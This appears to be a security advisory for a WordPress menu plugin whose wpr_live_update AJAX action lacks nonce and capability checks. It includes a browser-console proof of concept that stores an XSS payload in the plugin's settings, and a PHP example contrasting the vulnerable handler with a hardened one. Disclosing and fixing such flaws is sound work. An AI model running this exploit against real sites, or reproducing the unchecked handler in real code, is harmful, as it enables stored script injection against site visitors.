The plugin lacks capability and CSRF (nonce) checks in its wpr_live_update AJAX action, and does not sanitise or escape some of the data submitted to it. As a result, any authenticated user, such as a subscriber, could update the plugin's settings and perform Stored Cross-Site Scripting attacks against all visitors and users of the frontend.
// Proof of concept: run from the browser console while logged in to the target site as a
// low-privileged user (e.g. subscriber). The request is same-origin, so the session cookie is sent.
fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  // The position value is stored unsanitised and later output unescaped on the frontend.
  "body": "action=wpr_live_update&wprmenu_options[enabled]=1&wprmenu_options[position]=\"><img src onerror=alert(/XSS/)>",
  "method": "POST",
})
  .then(response => response.text())
  .then(function(data) {
    console.log(data);
    // Second request made by the PoC after the settings update.
    fetch("https://example.com/wp-admin/admin-ajax.php", {
      "headers": {
        "content-type": "application/x-www-form-urlencoded",
      },
      "body": "action=wpr_get_transient_from_data",
      "method": "POST",
    });
  });
The XSS payload is then triggered on every frontend page.
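The following is an added illustration, not code from the plugin: it contrasts the vulnerable AJAX handler pattern described above (no nonce check, no capability check, no input validation, no output escaping) with a hardened version using WordPress's own APIs. All function, hook and option names prefixed with example_ are assumptions; the WordPress calls (check_ajax_referer, current_user_can, wp_unslash, update_option, esc_attr, wp_send_json_*) are real.

```php
<?php
// Added example, not the plugin's code. Names prefixed example_ are hypothetical.

// --- Vulnerable pattern (as described in the advisory) ---
// Every wp_ajax_* hook is reachable by any logged-in user, so without a nonce
// and a capability check a subscriber can change options at will.
function example_vuln_live_update() {
    $options = isset( $_POST['wprmenu_options'] ) ? (array) $_POST['wprmenu_options'] : array();
    // Stored exactly as submitted: "><img src onerror=alert(1)> persists in the DB
    update_option( 'example_wprmenu_options', $options );
    wp_send_json_success( $options );
}

// --- Hardened handler ---
function example_safe_live_update() {
    // 1. CSRF: require a nonce created with wp_create_nonce( 'example_live_update' )
    //    and sent as the _wpnonce POST field; dies with 403 when missing/invalid.
    check_ajax_referer( 'example_live_update', '_wpnonce' );

    // 2. Authorisation: only users allowed to manage options may change settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 3. Input validation: allow-list each field instead of trusting raw POST data.
    //    WordPress adds slashes to $_POST, hence wp_unslash().
    $raw   = isset( $_POST['wprmenu_options'] ) ? (array) wp_unslash( $_POST['wprmenu_options'] ) : array();
    $clean = array(
        'enabled'  => ! empty( $raw['enabled'] ) ? 1 : 0,
        'position' => in_array( $raw['position'] ?? '', array( 'left', 'right' ), true )
            ? $raw['position']
            : 'left',
    );
    update_option( 'example_wprmenu_options', $clean );
    wp_send_json_success( $clean );
}
// Only the hardened handler is registered; no wp_ajax_nopriv_ hook, so
// unauthenticated callers get the usual "0" from admin-ajax.php.
add_action( 'wp_ajax_example_live_update', 'example_safe_live_update' );

// 4. Output escaping: even validated data is escaped when rendered, so a value
//    that slipped past validation cannot break out of the attribute.
function example_render_menu_attr() {
    $opts = get_option( 'example_wprmenu_options', array() );
    printf(
        '<div class="example-menu" data-position="%s"></div>',
        esc_attr( $opts['position'] ?? 'left' )
    );
}
```

Validation and escaping are deliberately separate layers: the allow-list stops the payload from being stored, and esc_attr() on output stops any stored value from ever being interpreted as markup. A nonce alone does not fix the issue, because a subscriber can obtain a nonce from any admin page they are allowed to load; the current_user_can() check is what actually restricts who may change the settings.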